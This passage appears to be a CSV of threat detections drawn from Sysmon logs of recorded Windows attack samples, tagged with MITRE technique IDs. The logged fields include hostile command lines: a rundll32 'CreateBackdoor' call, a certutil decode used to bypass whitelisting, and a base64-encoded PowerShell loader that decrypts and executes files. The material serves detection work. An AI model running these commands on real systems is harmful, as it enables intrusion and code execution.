+ 3836
+ C:\Windows\System32\sdclt.exe
+ ?
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243514
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.511
+ 747F3D96-9F61-5E75-0000-0010736B1E00
+ 8116
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243514
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.511
+ 747F3D96-9F61-5E75-0000-0010736B1E00
+ 8116
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5982
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:20.164
+ 365ABB72-3D70-5CEB-0000-0010B2E2FF00
+ 2108
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5532
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 15:08:07.355
+ 747F3D96-A357-5D45-0000-0010BD149A01
+ 5396
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-A356-5D45-0000-001014F99901
+ 4056
+ C:\Windows\System32\mmc.exe
+ "C:\Windows\System32\mmc.exe" eventvwr.msc
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 143189
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-05-12 15:06:49.415
+ 747F3D96-BB89-5EBA-0000-001019683600
+ 4688
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\Windows\System32\cmd.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-B086-5EBA-0000-0020BF9E0800
+ 0x89ebf
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-BB89-5EBA-0000-001042653600
+ 1088
+ C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe
+ C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4890
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:32:58.940
+ 747F3D96-660A-5D3F-0000-0010FFF28500
+ 700
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil -f -decode fi.b64 AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-660A-5D3F-0000-0010B9E08500
+ 3184
+ C:\Windows\System32\cmd.exe
+ cmd /c certutil -f -decode fi.b64 AllTheThings.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16150
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-11 18:10:42.653
+ 365ABB72-1022-5CD7-0000-0010DF121C00
+ 3248
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ c:\Windows\System32\cmd.exe
+ C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-8693-5CD7-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-8693-5CD7-0000-0010765E0000
+ 492
+ C:\Windows\System32\lsass.exe
+ C:\Windows\system32\lsass.exe
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4890
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:32:58.940
+ 747F3D96-660A-5D3F-0000-0010FFF28500
+ 700
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil -f -decode fi.b64 AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-660A-5D3F-0000-0010B9E08500
+ 3184
+ C:\Windows\System32\cmd.exe
+ cmd /c certutil -f -decode fi.b64 AllTheThings.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4890
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:32:58.940
+ 747F3D96-660A-5D3F-0000-0010FFF28500
+ 700
+ C:\Windows\System32\certutil.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ CertUtil.exe
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ certutil -f -decode fi.b64 AllTheThings.dll
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4
+ 747F3D96-660A-5D3F-0000-0010B9E08500
+ 3184
+ C:\Windows\System32\cmd.exe
+ cmd /c certutil -f -decode fi.b64 AllTheThings.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243512
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.504
+ 747F3D96-9F61-5E75-0000-0010686A1E00
+ 4848
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5447
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 12:08:19.888
+ 747F3D96-7933-5D45-0000-0010227E0701
+ 6000
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-D4E9-5D45-0000-0020E7030000
+ 0x3e7
+ 1
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-7930-5D45-0000-001055DE0601
+ 4740
+ C:\Windows\System32\consent.exe
+ consent.exe 896 318 0000028064471300
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243512
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.504
+ 747F3D96-9F61-5E75-0000-0010686A1E00
+ 4848
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243512
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.504
+ 747F3D96-9F61-5E75-0000-0010686A1E00
+ 4848
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17717
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:48.342
+ 365ABB72-28D0-5CDA-0000-0010F76F1300
+ 3964
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /groups
+ C:\temp\PowerShell-Suite-master\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002087350100
+ 0x13587
+ 1
+ Medium
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-28A0-5CDA-0000-001074181300
+ 2016
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 17717
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-14 02:32:48.342
+ 365ABB72-28D0-5CDA-0000-0010F76F1300
+ 3964
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\whoami.exe" /groups
+ C:\temp\PowerShell-Suite-master\
+ IEWIN7\IEUser
+ 365ABB72-26E1-5CDA-0000-002087350100
+ 0x13587
+ 1
+ Medium
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-28A0-5CDA-0000-001074181300
+ 2016
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 15678
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-10 13:33:29.409
+ 365ABB72-7DA9-5CD5-0000-00100ED31400
+ 2524
+ C:\Windows\System32\whoami.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami /priv
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-79DF-5CD5-0000-0020F8410100
+ 0x141f8
+ 1
+ High
+ SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274
+ 365ABB72-7D86-5CD5-0000-0010CC2E1400
+ 2076
+ C:\Windows\System32\cmd.exe
+ "c:\Windows\System32\cmd.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 1912935
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2021-08-22 19:33:38.890
+ 00247C92-A692-6122-0000-0010A5CD1F02
+ 11328
+ C:\Windows\System32\whoami.exe
+ 10.0.19041.1 (WinBuild.160101.0800)
+ whoami - displays logged on user information
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ whoami.exe
+ whoami
+ C:\WINDOWS\system32\
+ NT AUTHORITY\SYSTEM
+ 00247C92-7087-6122-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88
+ 00247C92-A691-6122-0000-001021C31F02
+ 14048
